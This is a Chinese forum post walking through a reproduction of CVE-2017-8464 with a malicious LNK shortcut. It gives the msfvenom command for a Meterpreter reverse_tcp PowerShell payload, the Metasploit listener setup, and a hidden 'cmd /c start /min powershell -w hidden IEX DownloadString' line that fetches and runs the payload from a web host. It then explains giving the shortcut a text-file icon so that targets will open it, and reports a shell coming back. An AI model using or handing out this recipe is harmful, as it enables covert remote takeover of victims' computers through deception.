CVE-2017-8464 lnk快捷方式复现小技巧

2017-06-16 11:13:13 22 2133
0X00

其实这些东西也没什么好稀奇的,很多大牛都已经事先复现成功了,但是我也想来造一个轮子!

0X01

主要就是在复现的基础上加上一些以前自己玩badusb的小技巧

0X02

我们首先用MSF生成一个payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=你的IP LPORT=端口 -f psh-reflection >ww.ps1
(我这边是用的外网的kali所以在Xshell里面执行的)

现在用sz ww.ps1命令把生成的payload下载到本机电脑

然后将ww.ps1上传到你自己的web目录下!

这边设置msf监听payload

1:use exploit/multi/handler  (执行MSF的监听模块)

2:set payload windows/meterpreter/reverse_tcp  (设置监听payload)

3: set LHOST IP

4:set LPORT 端口

5:set exitonsession false  (开启后台监听)

6:exploit -j  (开始监听)
0X02

这边我们就来制作我们的lnk后门程序了!

cmd.exe /c start /min powershell -w hidden ""IEX (New-Object Net.WebClient).DownloadString('http://www.xxxx.com/ww.ps1'); ""
这段代码的意思是以cmd执行powershell远程下载并执行我web目录下的ww.ps1文件!其中/c start /min powershell -w hidden主要作用就是为了隐藏powershell那个蓝色的框



这样的东西你发给谁他都不会打开的!





在这里你随便输入个字母然后回车就会出现很多图标给你更换



我们换个系统文本的图标



然后我们双击运行



这边已经成功反弹回来了

0X04

只是造个轮子,很多地方还比不上大佬些,各种奇淫技巧还需要大佬们支招!

自评TCV 0

关于作者

白色小黑9篇文章151篇回复

白色的菜鸟小黑一枚!

评论22次

要评论?请先  登录  或  注册